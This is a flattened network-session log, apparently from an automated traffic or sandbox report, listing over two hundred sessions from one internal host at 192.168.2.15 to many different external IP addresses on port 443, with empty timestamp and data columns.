                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15632192.168.2.1544584217.12.14.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15633192.168.2.155780489.14.189.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15634192.168.2.1544164195.105.127.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15635192.168.2.155732899.100.196.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15636192.168.2.1547742189.80.102.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15637192.168.2.15553085.144.165.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15638192.168.2.154244838.179.31.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15639192.168.2.1533862180.32.192.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15640192.168.2.1547708150.95.27.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15641192.168.2.1540878101.71.163.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15642192.168.2.1537918188.191.37.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15643192.168.2.15429722.79.10.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15644192.168.2.153722652.175.140.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15645192.168.2.154872247.181.95.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15646192.168.2.153839277.159.117.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15647192.168.2.1556152129.104.200.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15648192.168.2.1538884217.145.81.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15649192.168.2.1541410161.173.91.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15650192.168.2.153596074.115.99.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15651192.168.2.1549100171.37.73.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15652192.168.2.155770487.145.30.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15653192.168.2.1552662106.210.146.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15654192.168.2.153867866.186.72.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15655192.168.2.1556284222.145.187.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15656192.168.2.1550094112.131.123.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15657192.168.2.1533542220.162.126.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15658192.168.2.153750298.47.221.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15659192.168.2.1551512102.110.205.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15660192.168.2.1544422157.144.172.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15661192.168.2.155713495.101.210.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15662192.168.2.155619019.129.197.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15663192.168.2.153563652.9.106.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15664192.168.2.15541924.90.219.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15665192.168.2.1559556188.146.13.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15666192.168.2.1544698161.172.61.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15667192.168.2.1536944105.45.237.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15668192.168.2.1533522101.26.84.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15669192.168.2.153388039.126.0.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15670192.168.2.155048297.180.135.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15671192.168.2.1536360134.212.0.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15672192.168.2.1557608159.188.3.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15673192.168.2.1533878123.45.92.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15674192.168.2.1533666133.216.219.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15675192.168.2.1548212179.232.196.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15676192.168.2.15386809.150.89.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15677192.168.2.1554996145.214.227.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15678192.168.2.153748463.166.66.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15679192.168.2.156018468.169.43.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15680192.168.2.1548322172.244.191.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15681192.168.2.1543558186.231.68.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15682192.168.2.1533956162.188.98.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15683192.168.2.1558920101.194.99.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15684192.168.2.156056690.38.189.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15685192.168.2.153761060.133.244.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15686192.168.2.1556760173.39.166.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15687192.168.2.155254854.95.150.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15688192.168.2.1542564117.42.216.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15689192.168.2.1535744192.251.38.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15690192.168.2.155741879.236.9.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15691192.168.2.155993096.126.66.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15692192.168.2.1554048206.167.69.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15693192.168.2.1556790197.67.95.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15694192.168.2.1536898141.171.10.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15695192.168.2.155548691.170.120.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15696192.168.2.155921847.129.16.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15697192.168.2.1557330144.95.19.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15698192.168.2.1538730192.54.125.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15699192.168.2.1537968186.211.186.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15700192.168.2.1539426104.14.65.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15701192.168.2.1555482143.70.30.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15702192.168.2.1559804170.250.240.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15703192.168.2.155888419.126.3.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15704192.168.2.156000014.146.204.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15705192.168.2.1551354143.248.189.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15706192.168.2.1560230168.195.56.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15707192.168.2.154224053.181.24.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15708192.168.2.15386101.232.141.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15709192.168.2.153419227.105.231.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15710192.168.2.1547202210.198.81.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15711192.168.2.155083887.249.64.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15712192.168.2.153893449.3.84.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15713192.168.2.1558428165.98.131.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15714192.168.2.154046881.113.67.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15715192.168.2.1543088180.144.220.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15716192.168.2.153749431.70.144.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15717192.168.2.1533984207.36.133.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15718192.168.2.1558114188.253.75.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15719192.168.2.155042060.85.223.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15720192.168.2.1536720173.19.241.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15721192.168.2.154846677.240.253.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15722192.168.2.154331062.157.131.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15723192.168.2.154287876.122.95.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15724192.168.2.154908843.174.101.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15725192.168.2.1541076204.62.4.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15726192.168.2.1542624193.57.5.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15727192.168.2.1552460149.205.58.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15728192.168.2.1546306193.87.226.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15729192.168.2.1558654166.102.109.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15730192.168.2.154678487.243.61.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15731192.168.2.1544832188.238.206.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15732192.168.2.155921268.212.188.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15733192.168.2.154669212.87.27.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15734192.168.2.1550878165.133.68.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15735192.168.2.1548114220.245.67.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15736192.168.2.1557116161.246.181.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15737192.168.2.154125048.135.66.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15738192.168.2.1534314126.17.39.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15739192.168.2.1555252149.54.247.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15740192.168.2.155910679.134.77.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15741192.168.2.155234265.200.208.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15742192.168.2.154822053.168.123.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15743192.168.2.1549148123.148.59.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15744192.168.2.1555698118.219.194.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15745192.168.2.154428273.12.48.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15746192.168.2.1560676183.98.197.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15747192.168.2.1557378184.75.184.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15748192.168.2.1551092172.156.232.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15749192.168.2.1547784131.9.116.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15750192.168.2.155525277.34.76.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15751192.168.2.1536862107.174.183.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15752192.168.2.156086292.157.197.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15753192.168.2.1555626134.238.109.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15754192.168.2.154673675.252.192.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15755192.168.2.1548652147.27.245.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15756192.168.2.1553136179.105.182.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15757192.168.2.1540966211.23.24.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15758192.168.2.1546744191.201.194.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15759192.168.2.1545566185.100.115.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15760192.168.2.1534204151.112.17.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15761192.168.2.154297687.138.62.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15762192.168.2.1548940180.86.245.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15763192.168.2.1537452131.175.37.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15764192.168.2.153481870.206.210.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15765192.168.2.1558616187.228.149.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15766192.168.2.153598084.77.239.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15767192.168.2.1554792181.116.40.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15768192.168.2.154192696.185.20.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15769192.168.2.1551298190.121.34.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15770192.168.2.154389244.12.172.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15771192.168.2.1543546126.125.44.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15772192.168.2.154464478.57.104.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15773192.168.2.154758669.21.222.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15774192.168.2.1559998101.204.192.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15775192.168.2.153320841.58.222.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15776192.168.2.1548076155.42.35.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15777192.168.2.1544334164.222.109.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15778192.168.2.1548488128.128.37.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15779192.168.2.1554382155.67.138.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15780192.168.2.1558026128.4.128.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15781192.168.2.1542860109.70.242.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15782192.168.2.1560964169.10.62.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15783192.168.2.1550152133.8.250.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15784192.168.2.155405619.190.13.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15785192.168.2.1545294192.11.149.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15786192.168.2.154717052.121.233.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15787192.168.2.1543538194.113.160.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15788192.168.2.1535414169.160.202.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15789192.168.2.1551002194.22.19.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15790192.168.2.1535906193.16.98.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15791192.168.2.153546866.137.176.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15792192.168.2.155882243.165.130.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15793192.168.2.1552822105.242.51.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15794192.168.2.1546214177.133.129.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15795192.168.2.153487289.208.237.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15796192.168.2.153794290.162.47.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15797192.168.2.154377691.8.154.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15798192.168.2.15564764.52.52.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15799192.168.2.155302274.186.214.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15800192.168.2.153607059.196.141.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15801192.168.2.154212272.83.163.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15802192.168.2.1537040181.22.150.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15803192.168.2.1539474187.19.226.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15804192.168.2.153299695.17.247.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15805192.168.2.155582435.237.92.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15806192.168.2.155543235.156.125.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15807192.168.2.1555052196.61.51.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15808192.168.2.153949899.100.9.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15809192.168.2.1558662106.222.248.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15810192.168.2.1536748191.144.104.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15811192.168.2.1542580101.104.214.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15812192.168.2.1555964126.59.177.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15813192.168.2.1550280183.220.78.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15814192.168.2.1560736136.84.242.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15815192.168.2.153551289.167.25.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15816192.168.2.154962023.71.249.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15817192.168.2.15421644.82.200.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15818192.168.2.155475059.117.3.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15819192.168.2.1543944223.20.5.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15820192.168.2.155561686.105.197.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15821192.168.2.153642239.193.130.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15822192.168.2.154451431.206.51.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15823192.168.2.1554092162.168.62.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15824192.168.2.15333804.234.203.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15825192.168.2.1540188153.53.42.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15826192.168.2.15383705.54.137.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15827192.168.2.1547850209.16.131.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15828192.168.2.1554856205.23.58.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15829192.168.2.154527042.166.139.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15830192.168.2.1551068172.145.103.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15831192.168.2.1535268218.252.99.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15832192.168.2.1556420213.128.254.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15833192.168.2.1553864222.85.197.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15834192.168.2.1550082165.252.110.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15835192.168.2.1543978188.198.169.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15836192.168.2.154343425.218.180.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15837192.168.2.154740290.110.24.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15838192.168.2.153714672.94.94.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15839192.168.2.155991282.67.190.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15840192.168.2.153943420.22.24.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15841192.168.2.1537616142.60.79.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15842192.168.2.156094817.102.53.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15843192.168.2.1536222129.113.50.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15844192.168.2.1558254157.47.38.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15845192.168.2.1559312126.219.13.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15846192.168.2.1538260161.228.121.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15847192.168.2.1551432161.27.149.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15848192.168.2.1560986172.211.20.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15849192.168.2.1558486208.117.159.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15850192.168.2.155059483.115.70.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15851192.168.2.1545600145.124.49.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15852192.168.2.153537827.164.201.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15853192.168.2.1560462159.68.107.249443
